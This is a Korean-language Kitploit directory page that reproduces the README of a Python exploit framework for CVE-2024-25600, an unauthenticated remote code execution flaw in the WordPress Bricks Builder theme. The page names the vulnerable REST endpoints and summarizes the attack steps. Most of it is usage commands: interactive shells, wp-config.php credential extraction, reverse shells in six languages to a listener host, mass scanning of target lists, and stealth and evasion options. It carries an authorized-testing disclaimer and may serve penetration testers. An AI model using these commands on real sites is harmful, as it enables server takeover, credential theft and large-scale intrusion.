Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - WordPress Bricks Builder 테마에 대한 인증되지 않은 RCE 익스플로잇. 대화형 셸, 리버스 셸, 파일 업로드/다운로드, 비동기 스캐닝, 스텔스 모드, 프록시 지원 및 다중 스레드 취약점 스캐닝을 갖춘 고급 악용 프레임워크. 승인된 보안 테스트 전용입니다. | Kitploit
도구/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
ReconnaissanceVulnerability ScannersExploitationShellcodeWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - WordPress Bricks Builder 테마에 대한 인증되지 않은 RCE 익스플로잇. 대화형 셸, 리버스 셸, 파일 업로드/다운로드, 비동기 스캐닝, 스텔스 모드, 프록시 지원 및 다중 스레드 취약점 스캐닝을 갖춘 고급 악용 프레임워크. 승인된 보안 테스트 전용입니다.

저장소 보기
1152개월 전아직 검토되지 않음

BricksRCE 익스플로이러

CVE-2024-25600 — WordPress Bricks Builder 인증되지 않은 RCE

Python Version CVSS CVE License Platform

CVE-2024-25600에 대한 승인된 보안 평가 도구
저자: Sudeepa Wanigarathna · 도구: BricksRCE 익스플로이러 v1.0
메인 스크립트: cve-2024-25600.py

b

[!IMPORTANT] 승인된 용도로만 사용하십시오. 이 도구는 보안 연구, 교육, 그리고 귀하가 소유하거나 명시적 서면 허가를 받은 시스템에 대한 테스트를 위한 것입니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.


목차

  • 개요
  • 취약점 세부 사항
  • 기능
  • 설치
  • 빠른 시작
  • 사용 가이드
  • 명령어 참조
  • 대화형 셸
  • 출력 및 로깅
  • 문제 해결
  • 저장소 구조
  • 버전 이력
  • 면책 조항
  • 저자 및 크레딧
  • 라이선스

개요

CVE-2024-25600은 WordPress Bricks Builder 테마에서 발견된 중대한, 인증되지 않은 원격 코드 실행 취약점입니다. render_element REST 엔드포인트에서 사용자 제어 입력을 부적절하게 처리하여 인증되지 않은 공격자가 영향을 받는 설치 환경에서 임의의 PHP/시스템 명령을 실행할 수 있습니다.

BricksRCE 익스플로이러 (cve-2024-25600.py)는 승인된 보안 전문가를 위한 완전한 기능의 Python 평가 도구로, 다음을 수행할 수 있습니다:

  • 취약한 Bricks Builder 설치 탐지
  • 통제된 명령 실행을 통한 영향 검증
  • 대화형 셸을 통한 피해 호스트와의 상호 작용
  • 비동기/스레드 워커를 사용한 대상 목록 대량 스캔
  • 보고를 위한 구조화된 결과 내보내기

취약점 세부 사항

속성값
CVE IDCVE-2024-25600
CVSS9.8 (심각)
공격 벡터네트워크 — 인증되지 않음
영향전체 원격 코드 실행, 기밀성/무결성/가용성 손상
영향을 받는 제품WordPress Bricks Builder 테마
영향을 받는 버전Bricks ≤ 1.9.6 (**1.9.6.1+**에서 패치됨)
취약점 유형인증되지 않은 원격 코드 실행
CWECWE-94 (부적절한 코드 생성 제어)

영향을 받는 엔드포인트

엔드포인트메서드
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

공격 요약

  1. 대상 페이지 소스에서 Bricks nonce 추출
  2. 악성 요소 페이로드가 포함된 조작된 render_element 요청 제출
  3. 서버 측 코드 평가로 인한 임의 명령 실행

참고 자료

  • CVE-2024-25600 (MITRE)
  • NVD 항목
  • Bricks Builder 변경 로그 / 보안 권고

기능

핵심 기능

기능설명
취약점 탐지제어된 마커 기반 프로브를 통해 RCE 확인
Nonce 추출다양한 방법(nonce 스크립트, 페이지 소스, 메타, REST)을 통한 nonce 발견
버전 탐지CSS/readme/REST에서 Bricks Builder 버전 식별
대화형 셸기록, 자동 완성 및 파일 전송 기능을 갖춘 완전한 REPL
단일 명령 모드하나의 명령 실행 후 종료 (스크립팅에 적합)
리버스 셸 도우미bash/nc/Python/PHP/Perl/Ruby 리버스 셸 생성
wp-config 추출wp-config.php를 찾아 읽기 시도
대량 스캔URL 목록에서 비동기 또는 스레드 방식의 다중 대상 스캔

운영 제어

기능설명
속도 제한요청 간 구성 가능한 지연
재시도 로직시간 초과 및 연결 오류 시 지수 백오프
User-Agent 회전요청당 임의의 브라우저 지문 사용
스텔스 모드무작위화된 Accept-Language/Accept-Encoding 헤더
프록시 지원HTTP, HTTPS, SOCKS5/SOCKS5h
이중 엔드포인트wp-json, rest_route 또는 둘 다 선호
강제 모드사전 검사 건너뛰고 직접 공격 시도
풍부한 CLIRich를 통한 진행 표시줄, 테이블 및 색상 패널

보고

기능설명
JSON/TXT 내보내기스캔 결과 및 취약한 대상 저장
명령 기록실행된 명령의 선택적 로깅
파일 로깅지속적인 bricks_rce.log 및 사용자 지정 로그 경로

설치

전제 조건

  • Python 3.8+
  • pip
  • 승인된 대상에 대한 네트워크 연결 가능

설정

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

종속성

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # optional — SOCKS5 proxy support

빠른 시작

https://target.example를 실습용 또는 승인된 대상으로만 교체하십시오.

# 대화형 셸
python3 cve-2024-25600.py -u https://target.example

# 단일 명령
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# 대량 스캔
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# 버전 탐지
python3 cve-2024-25600.py -u https://target.example --detect-version

# Burp 프록시를 통한 스캔
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

사용 가이드

모든 예제는 메인 스크립트 **cve-2024-25600.py**를 사용합니다.

1. 도움말 보기

python3 cve-2024-25600.py --help

2. 단일 대상 대화형 셸

대상이 취약한 것으로 확인된 후 대화형 RCE 셸을 엽니다.

python3 cve-2024-25600.py -u https://target.example

워크플로:

  1. URL 정규화 및 검증
  2. 페이지에서 nonce 추출
  3. 취약점 확인 (--force가 아닌 경우)
  4. 대화형 셸 진입

3. 단일 명령 실행

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

명령 출력을 파일에 저장:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. 페이로드 유형 선택

# 기본 PHP 예외 기반 페이로드
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() 기반 페이로드
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Bricks Builder 버전 탐지

python3 cve-2024-25600.py -u https://target.example --detect-version

명령과 결합:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. wp-config.php 추출

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

성공 시 wp-config_<target>.txt로 저장됩니다.

7. 리버스 셸 (승인된 실습 환경에서만)

# 터미널 1 — 리스너
nc -lvnp 4444

# 터미널 2 — bash 리버스 셸
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

지원되는 모든 리버스 셸 유형:

python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. 강제 모드 (취약점 검사 건너뛰기)

python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. 파일에서 대량 스캔

# targets.txt — 한 줄에 하나의 URL
python3 cve-2024-25600.py -f targets.txt

스레드, 지연, 스텔스 및 JSON 출력과 함께:

python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

async 대신 동기(스레드 풀) 스캔:

python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

조용한 대량 스캔:

python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. 엔드포인트 선택

# 두 엔드포인트 모두 (기본값)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# /wp-json/bricks/v1/render_element만
python3 cve-2024-25600.py -u https://target.example --endpoint json

# /?rest_route=/bricks/v1/render_element만
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. 스텔스 모드

python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20
도구 다운로드